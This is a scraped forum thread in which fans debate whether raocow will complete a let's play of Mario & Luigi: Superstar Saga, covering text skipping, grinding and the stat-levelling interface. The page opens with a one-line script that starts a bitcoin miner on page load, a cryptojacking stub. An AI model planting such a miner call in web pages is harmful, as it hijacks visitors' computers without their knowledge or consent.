<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

Mario & Luigi: Superstar Saga - Mario & Luigi: Superstar Saga

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Re: Mario & Luigi Superstar Saga

Postby Leet » 4 months ago

ano0maly wrote:
Leet wrote: My prediction, as before, is that this LP will not be completed.
People said that about La-Mulana, but we made it through with the help of people. We can make it through this too.
Because that game was hard. raocow doesn't need help to play this game. But look at how raocow treats text and tutorials in all other games, then look at this game.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/they

Postby KobaBeach » 4 months ago

Leet wrote: Because that game was hard. raocow doesn't need help to play this game. But look at how raocow treats text and tutorials in all other games, then look at this game.
don't forget raocow is also not an rpg person outside of like ff6??????? which he played as a child, so...

this is gonna suck
twitter (spicy at times!) | avatar by kuma

who cares:

HiroshiMishima
Aging Gamer

Postby HiroshiMishima » 4 months ago

Given the gameplay during combat, and exploring, I think raocow will do pretty well. There's a lot of reactionary stuff and that is kind of his forte. Try to have a little faith, he's not GameGrumps, after all.

Ashan
The world has become a place

Postby Ashan » 4 months ago

If he goes into it with the attitude of "this is an RPG where the main highlight is the dialogue" I don't think he should have that issue of skipping text. He skips text a lot but that's usually cause text isn't the focus of the game and he just wants to play the game.

Also this game requires like no grinding at all. Just fight most of the enemies you see as you go through the game and distribute your level ups somewhat evenly and you're fine. Like I said earlier, if anything this game is broken enough to make being OP pretty easy.

Mandew
First name: Marc
Pronouns: a person

Postby Mandew » 4 months ago

I think as far as RPG's go, this one is probably one that would befit him well.
video games

Voltgloss
The first story's end.
Pronouns: he/him/his

Postby Voltgloss » 4 months ago

KobaBeach wrote: hey there everyone this is raocow playing All the RPGs and today we're going to be playing dnd for the PLATO system
you and I both know a real-life-core of this would be legit fantastic

SAJewers
hi

Postby SAJewers » 4 months ago

I kinda hope this lp succeeds so other similar types of games like west of loathing can be lp'd in the future.
ImageImageImageImageImage
ImageImageImageImage

ano0maly
Discord User

Postby ano0maly » 4 months ago

Made an update to the OP
Leet wrote:
ano0maly wrote: People said that about La-Mulana, but we made it through with the help of people. We can make it through this too.
Because that game was hard. raocow doesn't need help to play this game.
And that's a detriment to this LP how...?
But look at how raocow treats text and tutorials in all other games, then look at this game.
Like how he treated them in La-Mulana.

He'll read and remember things from time to time, and if he forgets, we can remind/explain things previously shown on video, with spoiler tags if needed.
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

KobaBeach
obscure jrpg enthusiast

Voltgloss wrote:
KobaBeach wrote: hey there everyone this is raocow playing All the RPGs and today we're going to be playing dnd for the PLATO system
you and I both know a real-life-core of this would be legit fantastic
most of the early wrpgs and the sagas would end in like video 1 or 2

who cares:

Leet

ano0maly wrote: Made an update to the OP
Leet wrote:
ano0maly wrote: People said that about La-Mulana, but we made it through with the help of people. We can make it through this too.
Because that game was hard. raocow doesn't need help to play this game.
And that's a detriment to this LP how...?
But look at how raocow treats text and tutorials in all other games, then look at this game.
Like how he treated them in La-Mulana.

He'll read and remember things from time to time, and if he forgets, we can remind/explain things previously shown on video, with spoiler tags if needed.
You're not understanding what I'm saying in any way.

raocow doesn't need help to play this game. I'm absolutely certain he could beat it. That's not what I'm talking about, though.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

ano0maly
Discord User

Re: Mario & Luigi: Superstar Saga - TSRP

I'm pretty sure that if he could beat it he will. There's just too much entertaining content sprinkled everywhere not to.

I don't know what problem there will be to finishing the LP if not the difficulty. And this is a Patreon voted game, so there's an extra incentive to see it through.

Now the sole biggest

Leet

Because most of every video will be spent reading and doing RPG combat...?

ano0maly
Discord User

No.

Maybe about half the video will be spent on RPG aspects and combat on new or interesting things (the rest can be edited), and the other half on puzzles and referential amusement moments.

(And reading isn't all same stuff - it's a mix of character dialogue, descriptions from examining things, rules for in-game challenges, etc.)

Now the sole biggest

Sebby19

Postby Sebby19 » 4 months ago

ano0maly wrote: I don't know the contents of this port, but it would be interesting for people who do to share some comparative information on it.
I guess I could do that.
I'm not really interested in pointing out every change the remake has, day by day, like I did with La-Mulana. I'll probably just save a bunch of the major and overall changes until rao gets a good ways into the game. Earliest would be after the 3rd major boss, but more likely much later.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

Blivsey
forever an obscure pokemons
First name: Liv

Postby Blivsey » 4 months ago

I maintain the opinion I've had from the start: relax. It's gonna be fine.

rao isn't an idiot and he's certainly not easily deterred. He's not going to give up on a genuinely fun and genuinely funny game just because it's taking a long time or whatever, and his brain certainly isn't going to suddenly fry just because a game is turn-based and not PLAY PLAY PLAY PRESS BUTTONS.

Sure, he might forget things he's been tutorialed on, but that's what the hundreds of viewers screaming in the thread and comments are for. And besides, this is not an insanely hard RPG (

excluding the final boss, and if he gets that far he's pretty much locked into finishing the LP anyway, so HA

), and anything troubling in it can be worked past by learning the fight in question. Yknow, like any game ever.

The way I see it? If there's any turn-based RPG rao should be doing an LP of, it's this or bust. It's a turn-based RPG, yeah, but the action parts of the battle system make it a hands-on RPG that requires skill rather than "input your command and watch the machine work". Once he figures out the skill the game is asking of him, it's just a matter of applying that knowledge and succeeding– and woah, that sentence could apply to literally any game or smwhack he has ever played. And regarding other rpg-like aspects of the game, like sidequests, they're still pretty solid, and definitely no amount of mind-dulling fetchery that MMZX couldn't prepare rao for. If we spend a whole episode sitting there and painting shirts for half an hour, that's basically just the same rao charm that brought us Break Man and General episodes.

So yeah. It's going to be fine. The only way I see raocow ending this series early is if all his viewers complain vehemently against it like the did with the one-act format of AtS. And I don't think that's happening, so we're taking this train whether you like it or not!
convenient noise thread for stress-relief purposes

Kleetus

Postby Kleetus » 4 months ago

I don't think all the reading will be that big of a detractor, the writing in the game is pretty out there and adds a lot of personality.
The cut scenes are as much over the top animations as they are dialogue, which makes plot dumping better.
I doubt that I'll find it as funny now, but as a kid, I thought this game was absolutely hilarious.

Zummorr
Bug Catcher

Postby Zummorr » 4 months ago

Kleetus wrote: I don't think all the reading will be that big of a detractor, the writing in the game is pretty out there and adds a lot of personality.
The cut scenes are as much over the top animations as they are dialogue, which makes plot dumping better.
I doubt that I'll find it as funny now, but as a kid, I thought this game was absolutely hilarious.
As far as reading goes. raocow enjoyed Iji just fine.

I'm pretty sure the text is less of a problem than the enemy encounters.

Awoo
Wolf girls? In *my* area? It's more likely than you think!

Re: Mario & Luigi: Superstar Saga - TSRPR

Postby Awoo » 4 months ago

I have no idea what these games are like, so I'm super excited to watch it blind and find out things together with raocow!

As he says, "let's find out together"! :rao:
ワンワン :pal:

Mata Hari

Postby Mata Hari » 4 months ago

ano0maly wrote:
Mata Hari wrote: Impressive start to the thread. Really surpassed yourself chaps
I only had a few minute gap available when I made the thread. I'm willing to formulate a detailed OP when I get home.
Heh, it wasn't you I was going after but I appreciate your concern.

Ashan wrote: Also this game requires like no grinding at all. Just fight most of the enemies you see as you go through the game and distribute your level ups somewhat evenly and you're fine.
I mean the question is whether he'd realize

you can level up stats other than HP

without us having to tell him, because I didn't when I was a bab and it really fucked me. IIRC there ain't nothing in the UI to indicate that you can. Plus I was bad at video games because I was a child.

raekuul
X&BUTT
First name: Pokota

Postby raekuul » 4 months ago

If that happens without comment more than three times in a row, we can point it out.

Mata Hari

Postby Mata Hari » 4 months ago

Yeah I don't think anyone would consider it spoilers to tell him but I do think it'd be funny to let it happen a couple of times

KobaBeach
obscure jrpg enthusiast

Plus raocow is bad at video games, much like a child

who cares:

Sebby19

Postby Sebby19 » 4 months ago

My idea was to eventually post a video about chuggaaconroy saying why he was the worst M&L player in the world, as a child.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

Voltgloss
The first story's end.

Postby Voltgloss » 4 months ago

Question for those very familiar with this game, coming from someone (me) in the camp of "played it through once and beat it years ago but barely remembers any of the specifics":

Is grinding actually needed in this game? I vaguely recall just moving through the game straight through without stopping to grind *anywhere* and having a reasonable time. ("Reasonable" meaning "I'm sure I had to replay a few boss fights, particularly endgame, but the answer each time was to replay with a tweaked strategy and/or better performance on reactions, rather than spend time grinding.") Is this accurate or am I way offbase? The latter is entirely possible. Hell, I might be thinking of a different game in the series.

Ashan
The world has become a place

Postby Ashan » 4 months ago

Mata Hari wrote:
Ashan wrote: Also this game requires like no grinding at all. Just fight most of the enemies you see as you go through the game and distribute your level ups somewhat evenly and you're fine.
I mean the question is whether he'd realize

you can level up stats other than HP

without us having to tell him, because I didn't when I was a bab and it really fucked me. IIRC there ain't nothing in the UI to indicate that you can. Plus I was bad at video games because I was a child.
Hahaha so I'm not the only one! I literally couldn't get past

the giant piranha plant boss because I didn't have my attack leveled high enough so it healed faster that I could damage it.

In the Japanese version they added an indicator with a D-pad pointing up/down so I don't think it's a spoiler to just say from the get-go that the leveling UI isn't very clear in the NA release.

Return to “let's play”